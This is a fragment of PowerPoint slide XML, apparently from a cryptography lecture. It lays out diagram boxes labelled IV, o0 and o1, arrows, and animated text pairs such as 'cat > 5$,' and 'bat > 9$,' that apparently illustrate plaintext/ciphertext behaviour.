                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18381" y="14460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="14357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15992" y="17991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12046" y="20474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9865" y="21267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8619" y="20448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6023" y="14613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15369" y="14588"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1102" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="189962" y="3095413"/>
              <a:ext cx="652499" cy="643468"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="652497" cy="643466"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1100" name="Square"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2257" y="0"/>
                <a:ext cx="643468" cy="643467"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25400" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="1101" name="o1"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="126308"/>
                <a:ext cx="652498" cy="386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defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr i="1"/>
                  <a:t>o</a:t>
                </a:r>
                <a:r>
                  <a:rPr baseline="-20250" i="1"/>
                  <a:t>1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1106" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4285262" y="3980462"/>
            <a:ext cx="652498" cy="643467"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1104" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="o0i1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>0</a:t>
              </a:r>
              <a:r>
                <a:rPr i="1"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1109" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1957493" y="4005297"/>
            <a:ext cx="652499" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1107" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1108" name="o0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754488" y="4213013"/>
            <a:ext cx="1347895" cy="2325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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1113" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952977" y="4016586"/>
            <a:ext cx="652499" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1112" name="IV"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="148025"/>
              <a:ext cx="652498" cy="34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1300480">
                <a:defRPr i="1" sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr i="0"/>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>IV</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10747022" y="2192302"/>
            <a:ext cx="262583" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1115" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10749280" y="4145279"/>
            <a:ext cx="262583" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10747022" y="6062133"/>
            <a:ext cx="262583" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1117" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10742507" y="8055750"/>
            <a:ext cx="262583" cy="342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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="cat &gt; 5$,…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1688817" y="7680959"/>
            <a:ext cx="1841799" cy="736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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>cat &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>5$,</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F70000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bat &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>9$,</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="cat &gt; 5-x…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684302" y="7676444"/>
            <a:ext cx="1841798" cy="736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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>cat &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>5-x</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F70000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bat &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>9?&gt;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118">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">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118">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="111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1118">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="111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xit" nodeType="clickEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetClass="exit" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetClass="exit" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1118">
                                            <p:bg/>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2" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1048"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1048"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1047"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1047"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1044"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1044"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1042"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1042"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1060"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1060"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="48" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
